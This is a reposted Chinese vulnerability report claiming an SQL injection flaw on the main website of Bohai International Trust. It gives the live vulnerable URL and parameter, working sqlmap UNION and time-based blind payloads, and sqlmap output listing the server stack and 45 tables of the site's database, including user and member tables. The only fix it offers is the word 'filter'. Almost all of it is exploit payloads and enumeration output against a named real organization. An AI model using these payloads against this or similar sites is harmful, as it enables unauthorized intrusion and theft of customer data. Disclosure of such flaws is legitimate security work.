渤海国际信托主站存在SQL注入漏洞
程序员文章站
2022-03-16 16:22:52
渤海国际信托主站存在SQL注入漏洞
#1 网址
https://www.bohaitrust.com/
#2 注入点
https://www.bohaitrus...
渤海国际信托主站存在SQL注入漏洞
#1 网址
https://www.bohaitrust.com/
#2 注入点
https://www.bohaitrust.com/Journal/favors/cid/4?newid=107
#3 证明
Parameter: newid (GET) Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: newid=-3925) UNION ALL SELECT CONCAT(0x716a786b71,0x76555175746650765465,0x7170767671)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: newid=107) AND SLEEP(5) AND (2974=2974 --- [22:46:32] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.9, PHP 5.5.12 back-end DBMS: MySQL 5.0.11 [22:46:32] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables [22:46:32] [INFO] fetching tables for database: 'bohaitrust' [22:46:32] [INFO] the SQL query used returns 45 entries Database: bohaitrust +-------------------------+---------+ | Table | Entries | +-------------------------+---------+ | ystar_vote_result | 1391 | | ystar_netvalue | 486 | | ystar_netvalue_old1231 | 447 | | ystar_message | 375 | | ystar_article_content | 304 | | ystar_article | 303 | | ystar_document | 297 | | ystar_product_crm | 269 | | ystar_contact_bak0129 | 252 | | ystar_contact | 251 | | ystar_product2 | 228 | | ystar_product | 191 | | ystar_member | 188 | | ystar_product_bak0123 | 178 | | ystar_product_bak0108 | 174 | | ystar_auth_menu | 147 | | ystar_auth_rule | 147 | | ystar_journals_article | 121 | | ystar_journals_channel | 61 | | ystar_document_cate | 54 | | ystar_channel | 44 | | ystar_config_bak1202 | 44 | | ystar_config | 43 | | ystar_vote_body | 24 | | ystar_member_sell | 20 | | ystar_journals_email | 18 | | ystar_member_apply | 14 | | ystar_advert | 10 | | ystar_auth_group_access | 10 | | ystar_auth_user | 10 | | ystar_guestbook | 8 | | ystar_journals | 8 | | ystar_vote_subject | 8 | | ystar_auth_group | 7 | | ystar_gift | 7 | | ystar_member_lsdz | 7 | | ystar_advert_position | 6 | | ystar_apply_member | 6 | | ystar_product_log | 6 | | ystar_product_doc | 4 | | ystar_gift_cate | 2 | | ystar_memberneed_log | 2 | | ystar_product_zr | 2 | +-------------------------+---------+
解决方案:
过滤
上一篇: Android快速自定义Toolbar